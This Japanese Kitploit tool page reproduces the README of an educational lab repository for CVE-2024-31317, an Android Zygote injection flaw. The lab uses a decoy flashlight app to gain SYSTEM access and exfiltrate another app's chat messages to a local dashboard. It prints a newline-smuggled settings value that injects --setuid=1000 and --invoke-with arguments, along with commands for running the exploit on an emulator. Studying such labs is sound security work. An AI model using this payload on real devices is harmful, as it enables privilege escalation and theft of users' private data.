Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ZygoteExploitDemo — AndroidにおけるCVE-2024-31317 Zygoteインジェクション脆弱性の教育用デモンストレーション | Kitploit
ツール/GitHubGitHub/gitamans/zygoteexploitdemo
Androidセキュリティ特権昇格脆弱性分析エクスプロイトモバイルアプリペンテストペネトレーションテストモバイルセキュリティ学習と教育バイナリエクスプロイトラボと実践
GitHubgitamans/zygoteexploitdemo

ZygoteExploitDemo

225ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

AndroidにおけるCVE-2024-31317 Zygoteインジェクション脆弱性の教育用デモンストレーション

リポジトリを見る

🔥 ZygoteExploitDemo - CVE-2024-31317 Android セキュリティラボ

🚨 Android Zygote インジェクション脆弱性の教育用デモ

GitHub stars GitHub forks GitHub license


📋 概要

このラボは CVE-2024-31317 を実演します。これは、悪意のあるアプリが権限を SYSTEM レベル (UID 1000) に昇格させ、Android サンドボックスをバイパスして他のアプリのデータをリアルタイムで読み取ることを可能にする、重大な Android 脆弱性です。

🎯 このデモが示すもの

段階説明ビジュアル
1ユーザーが無害そうな「Flashlight Pro」アプリをインストールする🔦
2アプリが CVE-2024-31317 を悪用して SYSTEM アクセスを取得する💉
3SYSTEM レベルのサービスが「SecureChat」のメッセージを読み取る👁️
4盗まれたメッセージがライブダッシュボードに表示される📊

🏗️ プロジェクト構造

root@kitploit:~
ZygoteExploitDemo/
├── 📱 apps/
│   ├── SecureChat/              # 被害者アプリ (Jetpack Compose)
│   │   ├── SQLite に保存された暗号化メッセージ
│   │   └── WhatsApp スタイルの暗号化をシミュレート
│   │
│   ├── FlashlightPro/           # エクスプロイトを含む悪意のあるアプリ
│   │   ├── 通常の懐中電灯 UI (陽動)
│   │   ├── バックグラウンドのエクスプロイトサービス
│   │   └── WRITE_SECURE_SETTINGS 権限
│   │
│   └── MonitorService/          # SYSTEM レベルの読み取りサービス
│       ├── エクスプロイト後に UID 1000 で実行
│       ├── SecureChat データベースを読み取り
│       └── ダッシュボードに外部送信
│
├── 📊 dashboard/                # Flask ウェブダッシュボード
│   └── app.py                   # 盗まれたメッセージをライブ表示
│
├── 📜 scripts/                  # 自動化スクリプト
│   ├── setup_vulnerable_emulator.sh
│   ├── build_all_apps.sh
│   ├── install_all_apps.sh
│   ├── run_exploit.py
│   └── monitor_logs.sh
│
├── 🎯 exploits/                 # エクスプロイト情報
│   ├── CVE-2024-31317.md
│   └── payloads.txt
│
└── 📁 tamplates/                # コードテンプレート
    ├── exploit_template.java
    └── dashboard_template.html

🔧 技術的詳細

脆弱性

CVE-2024-31317 は、Android の Zygote プロセスが hidden_api_blacklist_exemptions システム設定を処理する方法に存在します。入力サニタイズの欠如により、攻撃者は改行文字を注入して Zygote コマンドに任意の引数を追加できます。

攻撃ベクター:

root@kitploit:~
Settings.Global.putString(
    contentResolver,
    "hidden_api_blacklist_exemptions",
    "LClass1;->method1(\n" +
    "7\n" +
    "--setuid=1000\n" +     // Run as SYSTEM
    "--setgid=1000\n" +     // Run as SYSTEM group
    "--invoke-with\n" +
    "am start-service ...;\n"
);

影響を受けるバージョン

バージョンステータス
Android 9 - 14❌ 脆弱 (2024年6月パッチ以前)
Android 14+✅ パッチ適用済み (2024年6月のセキュリティ更新)
Android 15+✅ 安全

🚀 クイックスタートガイド

前提条件

  • ✅ Android Studio (最新版)
  • ✅ Flask を備えた Python 3.8+
  • ✅ Android SDK (platform tools 付き)
  • ✅ エミュレータ用に 10GB の空きディスク容量

ステップ 1: リポジトリのクローン

root@kitploit:~
git clone https://github.com/GitAmanS/ZygoteExploitDemo.git
cd ZygoteExploitDemo

ステップ 2: 脆弱なエミュレータのセットアップ

root@kitploit:~
cd scripts
chmod +x *.sh
./setup_vulnerable_emulator.sh

# Start the emulator
emulator -avd vulnerable_android_12

ステップ 3: アプリのビルドとインストール

root@kitploit:~
# In a new terminal
cd ZygoteExploitDemo/scripts
./build_all_apps.sh
./install_all_apps.sh

ステップ 4: ダッシュボードの起動

root@kitploit:~
cd ../dashboard
pip3 install flask flask-cors
python3 app.py

📱 ブラウザで http://localhost:5000 を開きます

ステップ 5: エクスプロイトの実行

root@kitploit:~
cd ../scripts
python3 run_exploit.py

ステップ 6: 魔法を目の当たりに ✨

  1. エミュレータで SecureChat アプリを開く
  2. テストメッセージを送信する
  3. ダッシュボードに 瞬時に 表示されるのを確認する 🔴

📸 デモビデオ

🎬 デモビデオは近日公開予定


🔬 仕組み - ステップバイステップ

  1. FlashlightPro が WRITE_SECURE_SETTINGS 権限を要求する
  2. エクスプロイトコードが悪意のあるペイロードを Zygote 設定に注入する
  3. Zygote が SYSTEM 権限 (UID 1000) で MonitorService を起動する
  4. SYSTEM サービスが Android サンドボックスの制限をバイパスする
  5. /data/data/com.securechat/databases/ からデータベースを直接読み取る
  6. HTTP POST 経由で Flask ダッシュボードに外部送信する
  7. 盗まれた暗号化メッセージをリアルタイム表示する

📚 学習リソース

  • Android セキュリティ速報
  • CVE-2024-31317 の詳細
  • CleoV2 によるオリジナル PoC

🤝 貢献

貢献は歓迎します! 以下の手順に従ってください:

  1. リポジトリをフォークする
  2. 機能ブランチを作成する
  3. プルリクエストを送信する

貢献できる分野:

  • 🎯 追加のエクスプロイトペイロード
  • 🛡️ より優れた検出方法
  • 📖 ドキュメントの改善
  • 🌍 他言語への翻訳

📄 ライセンス

MIT ライセンス - 詳細は LICENSE ファイルを参照してください


👨‍💻 作者

Aman - @GitAmanS


⭐ サポート

このコンテンツが教育的だと感じたら、スターを付けてください! ⭐


セキュリティ研究者によって、セキュリティ研究者のために作られました

覚えておいてください: 大いなる力には大いなる責任が伴う 🕷️

ツールをダウンロード